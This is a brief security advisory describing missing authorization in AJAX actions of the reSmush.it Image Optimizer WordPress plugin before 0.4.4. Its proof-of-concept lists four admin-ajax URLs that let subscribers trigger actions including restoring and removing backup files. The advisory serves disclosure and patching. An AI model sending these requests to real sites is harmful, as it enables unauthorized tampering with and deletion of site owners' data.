reSmush.it Image Optimizer < 0.4.4 - Subscriber+ AJAX Calls

The plugin lacks authorization in various AJAX actions, allowing any logged-in users, such as subscribers to call them.

PoC

Examples of actions where low-privileged users can directly ask - https://example.com/wp-admin/admin-ajax.php?action=resmushit_bulk_get_images - https://example.com/wp-admin/admin-ajax.php?action=resmushit_restore_backup_files - https://example.com/wp-admin/admin-ajax.php?action=resmushit_remove_backup_files - https://example.com/wp-admin/admin-ajax.php?action=resmushit_update_statistics